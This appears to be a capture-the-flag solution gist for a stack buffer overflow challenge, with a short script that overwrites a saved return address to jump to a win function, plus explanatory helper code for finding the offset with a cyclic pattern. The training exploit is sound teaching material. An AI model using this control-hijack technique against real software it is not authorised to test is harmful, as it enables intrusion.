Created
November 24, 2024 08:32
Binary Exploitation Tricky Control Hijack Hard
##########################################################################
# 1. Unlike the easy version, it does not give you helpful debug output.
#    You will have to recover this information using a debugger.
# 2. The source code is not provided.
#    You will need to reverse-engineer the binary, but remember,
#    the challenge is conceptually the same as the easy version,
#    so it can be helpful to have the easy version's source code
#    as a secondary reference during your reversing process!
# 3. Some randomization is different.
#    Buffers might have different lengths, offsets might vary, etc.
#    You will need to reverse engineer this information from the binary!
##########################################################################
import struct
import sys

# Distance in bytes from the start of the overflowed buffer to the saved
# return address on the stack (recovered with GDB).
offset_to_return = 120

# Address of the function to return into (recovered with GDB). A fixed
# address like this only works because the binary loads at a fixed base.
win_authed_addr = 0x401a95

# Padding up to the saved return address, then the target address packed as
# a little-endian 64-bit value ("<Q"), which is how x86-64 stores it.
payload = b"A" * offset_to_return
payload += struct.pack("<Q", win_authed_addr)

# Write raw bytes (not text) so the payload can be piped into the binary.
sys.stdout.buffer.write(payload)
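The header comments say the offset and address must be recovered from the binary with a debugger rather than read from debug output. The following is an added example, not part of the gist, showing the usual way the offset is recovered: a cyclic (de Bruijn) pattern in which every 4-byte window is unique, so whatever bytes end up in the saved-return-address slot identify their position in the input. It assumes a workflow the gist does not describe (feed `cyclic(N)` to the program under GDB, read the 8 bytes now in the return slot, pass them to `cyclic_find`); `de_bruijn`, `cyclic`, `cyclic_find` and `build_payload` are names chosen here, and the "observed" bytes in the demo are constructed, not taken from a real run.

```python
"""Added example (not from the gist): recover offset_to_return with a cyclic
pattern, then build the same padding + address payload the gist writes.

Assumed workflow: send cyclic(N) to the program under a debugger, read the
8 bytes sitting in the saved-return-address slot, and give them to
cyclic_find() to get the offset. The values below are constructed.
"""
import functools
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
SUBSEQ_LEN = 4  # every 4-byte window of the pattern is unique


@functools.lru_cache(maxsize=None)
def de_bruijn(n=SUBSEQ_LEN, alphabet=ALPHABET):
    """Return the de Bruijn sequence B(k, n) using the FKM necklace algorithm.

    For k=26, n=4 the result is 26**4 = 456976 bytes and starts 'aaaabaaac...'.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def visit(t, p):
        if t > n:
            if n % p == 0:
                out.extend(alphabet[a[j]] for j in range(1, p + 1))
            return
        a[t] = a[t - p]
        visit(t + 1, p)
        for j in range(a[t - p] + 1, k):
            a[t] = j
            visit(t + 1, t)

    visit(1, 1)
    return bytes(out)


def cyclic(length, n=SUBSEQ_LEN):
    """First `length` bytes of the pattern (raise if the pattern is too short)."""
    seq = de_bruijn(n)
    if length > len(seq):
        raise ValueError(f"pattern longer than {len(seq)} bytes needs a larger n")
    return seq[:length]


def cyclic_find(value, n=SUBSEQ_LEN):
    """Offset of a debugger-observed value inside the pattern, or -1 if absent.

    `value` is either the raw bytes read from the stack slot or the integer
    the debugger printed for it; an int is treated as a little-endian u64.
    Only the first n bytes are needed because every n-byte window is unique.
    """
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    window = bytes(value[:n])
    if len(window) < n:
        raise ValueError(f"need at least {n} bytes to locate a unique window")
    return de_bruijn(n).find(window)


def build_payload(offset, target_addr):
    """Padding up to the saved return address, then the address as a LE u64."""
    if offset < 0 or not 0 <= target_addr < 2**64:
        raise ValueError("offset must be >= 0 and address must fit in 64 bits")
    return b"A" * offset + struct.pack("<Q", target_addr)


if __name__ == "__main__":
    # Constructed demo: pretend the debugger showed these 8 bytes in the
    # return slot after cyclic(200) was sent; the recovered offset is 120,
    # the same value the gist hard-codes.
    observed = cyclic(200)[120:128]
    off = cyclic_find(observed)
    print(f"recovered offset = {off}")
    print(build_payload(off, 0x401A95).hex())
```

The same function works when the debugger shows the slot as a number rather than bytes, since `cyclic_find` accepts an `int` and unpacks it little-endian, which is the byte order the gist's `struct.pack("<Q", ...)` uses. A window that is not found (return value -1) means the bytes in the slot did not come from the pattern, which is the first thing to check before trusting an offset.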